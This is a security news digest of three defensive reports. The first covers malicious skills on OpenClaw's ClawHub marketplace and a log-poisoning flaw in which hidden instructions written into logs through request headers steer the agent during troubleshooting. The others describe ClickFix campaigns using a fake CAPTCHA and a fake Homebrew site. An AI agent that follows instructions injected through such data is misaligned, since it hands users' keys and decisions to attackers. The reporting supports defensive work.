Trending Topics

Update: OpenClaw Ecosystem Hit by Skill Marketplace Malware and Log Injection Weakness

A coordinated supply-chain campaign named ClawHavoc targeted OpenClaw’s official skill marketplace, ClawHub, by flooding it with at least 1,184 malicious Skills published over time. Attackers registered developer accounts, uploaded Skills that appeared legitimate, and then relied on documentation-driven social engineering to get users to run dangerous commands or install additional “helper” downloads. Antiy reported 12 malicious author IDs, with one uploader responsible for 677 packages, and noted that some high-download packages remained reachable even after removals. Analysis of the poisoned Skills shows multiple impact paths: staged downloads that pull additional malware, embedded reverse-shell behavior in scripts, and direct data theft. One reported example posed as a weather tool and attempted to exfiltrate OpenClaw’s local configuration file, which may contain paid AI service keys and other secrets. On macOS, an observed payload chain was tied to Atomic macOS Stealer, which is associated with credential and wallet-focused theft activity. In parallel, researchers disclosed a separate OpenClaw issue involving “log poisoning,” in which an attacker can insert hidden instructions into log files and later influence the agent when it reads those logs during troubleshooting. The weakness stems from unsanitized User-Agent and Origin header values being written to logs, with enough space to carry lengthy instruction blocks, and the attack can start with an unauthenticated connection attempt against exposed instances. The primary risks are decision hijacking and data leakage, not a classic software exploit, because the agent may treat the injected text as guidance during problem diagnosis. Maintainers patched the issue in version 2026.2.13 by sanitizing log inputs and limiting header sizes, and a fix is also referenced in a GitHub security advisory with an associated pull request. Together, these incidents show two pressure points in AI agent ecosystems: unvetted third-party extensions and indirect manipulation of an agent’s decision process through operational data. To reduce risk quickly, teams should upgrade OpenClaw to 2026.2.13 or later, remove untrusted Skills, and re-check what is installed across endpoints, and rotate any exposed secrets, with priority on API keys, tokens, and credentials referenced by OpenClaw. Access to OpenClaw should be locked down behind strong authentication and network controls; the service should run under a least-privilege account; and internet exposure should be avoided unless explicitly required and tightly monitored. Platform operators should also strengthen store defenses by scanning packages and their documentation for suspicious commands, URLs, and downloader patterns, applying publisher-reputation controls that slow or block mass uploads, and using rapid takedown workflows to quarantine suspicious Skills before they gain traction.

Fake CAPTCHA Click Triggers Multi-Stage Malware Spread Across an Enterprise

A recent incident at a major Polish organization shows how fake CAPTCHA pages using the ClickFix technique can turn a single user action into a broad internal compromise. The victim landed on a compromised website that displayed a Cloudflare-style verification prompt, but instead of validating anything, it instructed the user to open the Run dialog and execute a pasted command. That action launched a PowerShell download chain that pulled additional payloads from attacker-controlled domains and executed them on the endpoint. Investigators then found a clear DLL side-loading setup under the user profile, including a suspicious %APPDATA%\Intel folder containing a legitimate-looking executable alongside malicious DLLs, as well as additional oddly named DLLs in the local AppData path. The infection chain delivered two malware families, Latrodectus and Supper, which together enabled persistence, reconnaissance, and interactive remote control. This pattern is dangerous because it avoids exploiting a software flaw and instead relies on getting the user to run the attacker’s command, which can slip past controls that focus only on vulnerability-based attacks. Latrodectus served as the early-stage loader and backdoor, calling out to the attacker's infrastructure while sending system details that helped profile the environment and guide next steps. Analysis indicates a newer Latrodectus build with added evasion behavior, and recovered artifacts show it running extensive discovery commands to map the host and the organization’s domain relationships, including checks for trust paths, privileged groups, and installed security tools. Supper added the operational capability for deeper intrusion by establishing command-and-control, creating persistence through a Scheduled Task that also attempted cleanup to reduce forensic visibility, and supporting actions that can run programs remotely and enable proxy-based access for interactive control. The combined effect is a fast escalation path from a single compromised workstation into lateral movement, data theft, and ransomware preparation across the enterprise. To reduce exposure, organizations should harden endpoints against script-based downloads and execution, monitor for Run dialog and clipboard-driven command launches, and alert on suspicious PowerShell or cmd download patterns targeting unfamiliar domains. They should also block and hunt for DLL side-loading indicators in user-writable paths, monitor for suspicious scheduled tasks, and reinforce user guidance so employees treat unexpected verification prompts as hostile and report them rather than follow step-by-step instructions.

Update: ClickFix Abuses Fake Homebrew Install to Steal macOS Credentials and Developer Secrets

A ClickFix campaign targets macOS developers by impersonating the Homebrew installation flow and turning a routine terminal paste into a malware launch. The operation uses typosquatted domains that closely resemble the real Homebrew site, including homabrews[.]org, hosted on infrastructure tied to 5[.]255[.]123[.]244. Victims land on a near-identical clone of brew[.]sh where the install command and copy button appear normal, but the copied command quietly points downloads to an attacker-controlled “raw” domain that mimics GitHub’s raw content service. This approach avoids exploiting a software flaw and instead relies on habit, since many developers routinely paste curl-to-shell commands without verifying the domain. Researchers flagged the primary domain multiple times shortly after it was registered in January 2026, showing how quickly these lures can be spun up and rotated. The key risk is that a single paste can hand attackers both local access and high-value credentials tied to development work. After execution, the script presents itself as a Homebrew installer while inserting a credential-harvesting step that repeatedly prompts for the macOS password and checks it until it succeeds. Once a valid password is captured, it pulls a secondary component from/tmp, passes the stolen password in an encoded form, and removes macOS quarantine markers to reduce security prompts. It then sets up persistence using a LaunchAgent that masquerades as a Homebrew updater, helping the activity blend into normal workstation behavior. The second-stage payload, Cuckoo Stealer, establishes an encrypted command-and-control channel and supports remote actions, including running commands, stealing data, and removing itself to cover its tracks. Data theft targets a wide set of sources: browser credentials and session tokens, Keychain content, Apple Notes data, Discord and Telegram sessions, VPN and FTP configurations, Steam session data, and a long list of cryptocurrency wallet files, and it can also capture screenshots and quietly collect files from common user folders. To limit detection and reduce unwanted attention, it checks system language settings and avoids machines configured for certain CIS-region languages, and researchers linked the infrastructure to a broader cluster of similar terminal-phishing pages aimed at developer tools. To reduce exposure, teams should require installs only from the official brew[.]sh domain, train staff to verify the URL bar before copying commands, block known typosquats at DNS and web gateways, alert on terminal commands that fetch installers from unapproved raw-content domains, monitor for new or suspicious LaunchAgents that imitate developer utilities, and assume credential exposure by rotating passwords, revoking tokens, and auditing impacted macOS endpoints for unauthorized persistence and data access.